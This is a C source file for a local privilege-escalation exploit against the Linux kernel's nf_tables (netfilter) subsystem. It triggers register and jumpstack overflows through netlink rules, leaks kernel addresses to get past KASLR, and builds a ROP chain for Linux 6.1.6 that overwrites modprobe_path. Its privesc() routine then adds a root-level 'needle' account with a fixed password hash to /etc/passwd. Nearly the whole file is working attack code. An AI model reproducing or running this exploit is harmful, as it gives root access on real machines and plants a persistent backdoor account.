#define _GNU_SOURCE
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdint.h>
#include <sys/types.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <linux/netfilter/nfnetlink.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/set.h>
#include <libnftnl/expr.h>
#include <fcntl.h>
#include <sys/stat.h>

#include "exploit.h"
#include "helpers.h"

void split_struct(struct jumpstack_t s, char dest[][4])
{
    char* p = (char*) &s;
    int i;
    
    for (i = 0; i < sizeof(s); i += 4) {
        unsigned int x = *(unsigned int*) (p + i);
        memcpy(dest[i/4], &x, 4);
    }
}

struct jumpstack_t fill_jumpstack(unsigned long reg0, unsigned long kaslr) 
{
    struct jumpstack_t jumpstack = {0};
    jumpstack.init = 'A';
    jumpstack.rule =  reg0 + 0xf8;
    jumpstack.last_rule = 0xffffffffffffffff;
    jumpstack.eval = reg0 + 0x108;
    jumpstack.pivot = 0xffffffff81134571 + kaslr;
    unsigned char pad[31] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    strcpy(jumpstack.pad, pad);
    return jumpstack;
}

void get_4_bytes(unsigned long address, char* lsb, char* msb) 
{
    uint32_t address_32 = (uint32_t)(address >> 32);
    for (int i = 0; i < 4; i++) {
        lsb[i] = (address >> (i * 8)) & 0xff;
        msb[i] = (address_32 >> (i * 8)) & 0xff;
    }
}

int privesc()
{
    puts("[+] Returned to userland, setting up for fake modprobe");
    // Password is just "needle"
    system("echo '#!/bin/sh\necho needle:M6Jplzqa7rJp.:0:0:root:/root:/bin/sh >> /etc/passwd' > /tmp/windprobe");
    system("chmod +x /tmp/windprobe");

    int fd = open("/tmp/dummy", O_RDWR | O_CREAT);
    if (fd < 0) {
        perror("[-] Trigger creation failed");
        return -1;
    }
    char sig[] = "\xff\xff\xff\xff";
    write(fd, sig, sizeof(sig));
    close(fd);
    chmod("/tmp/dummy", 0777);
    execl("/tmp/dummy", "/tmp/dummy", (char *)NULL);
    return 0;
}

int create_final_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len, unsigned long regs, unsigned long instr)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);

    /*
        There are only a few possible addresses where regs will end up, depending on the Linux version.
        Option 1 helps finding these addresses to predict the next allocation point.
    */

    unsigned long reg0  = regs + 0x10;              // e.g. 0xffffc90000003af0; 0xffffc900000e0af0;
    unsigned long kaslr =  instr - INSTR_BASE;      // change me
    unsigned char lsb[4] = {};
    unsigned char msb[4] = {};
    struct jumpstack_t jumpstack = fill_jumpstack(reg0, kaslr);
    char dest[16][4];
    split_struct(jumpstack, dest);

    /*
    1. Prepare the jumpstack layout, saving space in the registers
        &jumpstack[8].chain = 0xffffc90000003bf0 = reg0 + 0x100
        the first address (0xffffc90000003be8) is the rule pointing 8 bytes before the expression address (0xffffc90000003bf8)
        the last address (0xffffffff81134571) is the first gadget, a stack pivot to reg32_00

    unsigned char *jumpstack[] =  {"A\xe8\x3b\x00", "\x00\x00\xc9\xff", "\xff\xff\xff\xff", "\xff\xff\xff\xff", "\xff\xf8\x3b\x00", "\x00\x00\xc9\xff", "\xff\x71\x45\x13", "\x81\xff\xff\xff", "\xff\x41\x41\x41", 
       "AAAA", "AAAA", "AAAA", "AAAA", "AAAA","AAAA", "AAAA"};

    unsigned char *jumpstack[] =  {"A\xe8\x0b\x0e", "\x00\x00\xc9\xff", "\xff\xff\xff\xff", "\xff\xff\xff\xff", "\xff\xf8\x0b\x0e", "\x00\x00\xc9\xff", "\xff\x71\x45\x13", "\x81\xff\xff\xff", "\xff\x41\x41\x41", 
        "AAAA", "AAAA", "AAAA", "AAAA", "AAAA","AAAA", "AAAA"};
    */

    for (int reg = NFT_REG32_00; reg <= NFT_REG32_15; reg++) {
       rule_add_immediate_data(r, reg, (void *) dest[reg - NFT_REG32_00], 4);
    }

    /*
    2. Trigger overflow, overwriting the jumpstack
    */
    rule_add_payload(r, NFT_PAYLOAD_LL_HEADER, offset, len, NFT_REG32_15);

    /*
    3. ROP chain setup for Linux 6.1.6, change accordingly
        Gadgets:
            0xffffffff81134571: add rsp, 0x48 ; pop ... ; ret   -> stack pivot, pops 0x30 bytes including rbp to reach REG32_00
            0xffffffff81015b34: pop rax; ret                    -> save new modprobe path
            0xffffffff8107fec5: pop rdi; ret                    -> save modprobe_path address
            0xffffffff810d18a2: mov [rdi] rax ; pop rbp ; ret   -> overwrite modprobe_path and restore rbp
            0xffffffff810b3af0: mov rsp, rbp ; pop rbp ; ret    -> return from nft_do_chain
        Static values:
            0xffffffff81c2cfa1:                     Instruction from TEXT returned by leak without KASLR
            0xffffffff8308fb40:                     modprobe_path
            0x6e69772f706d742f:                     /tmp/windprobe
            reg0 + 0x2b0:                           old rbp for nft_hook_slow
    */
    unsigned long pop_rax_ret       = 0xffffffff81015b34 + kaslr;
    unsigned long local_path        = TMP_WINDPROBE;
    unsigned long pop_rdi_ret       = 0xffffffff8107fec5 + kaslr;
    unsigned long modprobe          = 0xffffffff8308fb40 + kaslr;
    unsigned long mov_rdi_rax_ret   = 0xffffffff810d18a2 + kaslr;
    unsigned long old_rbp           = reg0 + 0x2b0;
    unsigned long nft_hook_slow_ret = 0xffffffff810b3af0 + kaslr;
    
    get_4_bytes(pop_rax_ret, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_00, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_01, (void *) msb, 4);

    get_4_bytes(local_path, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_02, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_03, (void *) msb, 4);

    get_4_bytes(pop_rdi_ret, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_04, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_05, (void *) msb, 4);

    get_4_bytes(modprobe, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_06, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_07, (void *) msb, 4);

    get_4_bytes(mov_rdi_rax_ret, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_08, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_09, (void *) msb, 4);

    get_4_bytes(old_rbp, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_10, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_11, (void *) msb, 4);

    get_4_bytes(nft_hook_slow_ret, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_12, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_13, (void *) msb, 4);

    // We even got 8 bytes left :)

    // 3. Break from the regs verdict switch, going back to the corrupted previous chain
    rule_add_immediate_verdict(r, NFT_CONTINUE, "final_chain");
    
    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

int create_jmp_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
    int i = atoi(chain_name);
    i++;
    char next_chain[5];
    sprintf(next_chain, "%d", i);

    if (i == 7) {
        // stackptr has been aligned, jump to the overflow chain
        rule_add_immediate_verdict(r, NFT_JUMP, "final_chain");
    } else {
        // Jump to the next jmp chain, incrementing stackptr
        rule_add_immediate_verdict(r, NFT_JUMP, next_chain);
    }

    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

int create_base_chain_rule_pwn(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
    rule_add_immediate_verdict(r, NFT_JUMP, "0");

    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

int create_base_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
    
    /* 
        UDP filtering is not always possible since the datagram might not be delivered as we only receive broadcasts.
        Still, this is where you can implement your own filtering logic

    in_addr_t d_addr;
    d_addr = inet_addr("192.168.123.123");
    rule_add_payload(r, NFT_PAYLOAD_NETWORK_HEADER, offsetof(struct iphdr, daddr), sizeof(d_addr), 8);
    rule_add_cmp(r, NFT_CMP_EQ, 8, &d_addr, sizeof d_addr);
    */

    rule_add_immediate_verdict(r, NFT_GOTO, "exploit_chain");

    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

int create_exploit_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
    
    // 1. Register grooming to check whether they have been overwritten
    char *keys[8];
    char *values[8];
    for (int i = 0; i < 8; i++) {
        keys[i] = "\xff\xff\xff\xff";
        values[i] = "\xff\xff\xff\xff";
    }
    for (unsigned int keyreg = NFT_REG32_00; keyreg <= NFT_REG32_07; keyreg++) {
        rule_add_immediate_data(r, keyreg, (void *) keys[keyreg - NFT_REG32_00], 4);
    }
    for (unsigned int datareg = NFT_REG32_09; datareg <= NFT_REG32_15; datareg++) {
        rule_add_immediate_data(r, datareg, (void *) values[datareg - NFT_REG32_09], 4);
    }

    // 2. Trigger overflow and overwrite registers
    rule_add_payload(r, NFT_PAYLOAD_LL_HEADER, offset, len, NFT_REG32_00);

    /*
    3. Copy useful registers to set
        Other Linux kernels may leak addresses inside different registers, you should try them all in that case

    for (int keyreg = NFT_REG32_00, datareg = NFT_REG32_08; keyreg <= NFT_REG32_07, datareg <= NFT_REG32_15; datareg++, keyreg++) {
        rule_add_dynset(r, "myset12", keyreg, datareg);
    }
    */
    rule_add_dynset(r, "myset12", NFT_REG32_06, NFT_REG32_07);
    rule_add_dynset(r, "myset12", NFT_REG32_14, NFT_REG32_15);

    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

int pwn(struct mnl_socket* nl, unsigned long regs, unsigned long instr) 
{
    char *table_name = "exploit_table", 
         *base_chain_name = "base_chain",
         *final_chain_name = "final_chain",
         *dev_name = "eth0";
         
    int seq = time(NULL);

    if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) {
        perror("[-] Failed creating table");
        exit(EXIT_FAILURE);
    }
    printf("[+] Created nft %s\n", table_name);

    struct unft_base_chain_param bp;
    bp.hook_num = NF_INET_PRE_ROUTING;
    bp.prio = 10;
    if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) {
        perror("[-] Failed creating base chain");
        exit(EXIT_FAILURE);
    }
    printf("[+] Created base chain %s\n", base_chain_name);

    if (create_chain(nl, table_name, final_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
        perror("[-] Failed creating final chain");
        exit(EXIT_FAILURE);
    }
    printf("[+] Created final chain %s\n", final_chain_name);

    char jmp_chain_name[5];
    for (int i = 0; i < 7; i++) {
        sprintf(jmp_chain_name, "%d", i);
        if (create_chain(nl, table_name, jmp_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
            perror("[-] Failed creating jmp chain");
            exit(EXIT_FAILURE);
        }
        printf("[+] Created jmp chain %s\n", jmp_chain_name);
    }

    if (create_base_chain_rule_pwn(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
        perror("[-] Failed creating base chain rule");
        exit(EXIT_FAILURE);
    }

    puts("[+] Successfully created base_chain rule!");
    for (int i = 0; i < 7; i++) {
        sprintf(jmp_chain_name, "%d", i);
        if (create_jmp_chain_rule(nl, table_name, jmp_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
            perror("[-] Failed creating jmp chain rule");
            exit(EXIT_FAILURE);
        }
        puts("[+] Successfully created jmp chain rule!");
    }

    uint8_t offset = 19, len = 4, vlan_hlen = 4;
    uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen;
    if (create_final_chain_rule(nl, table_name, final_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len, regs, instr)) {
        perror("[-] Failed creating final chain rule");
        return EXIT_FAILURE;
    }
    printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen);
    puts("[+] Successfully created exploit chain rule!");

    if (send_packet() == 0) {
        // Please do not interrupt
        system("nft delete table netdev exploit_table");
        puts("[+] Exploit triggered");
        if (privesc() == 0) {
            puts("[+] Got root, you can now login as \"needle:needle\"");
            return EXIT_SUCCESS;
        }
    }
    return EXIT_FAILURE;
}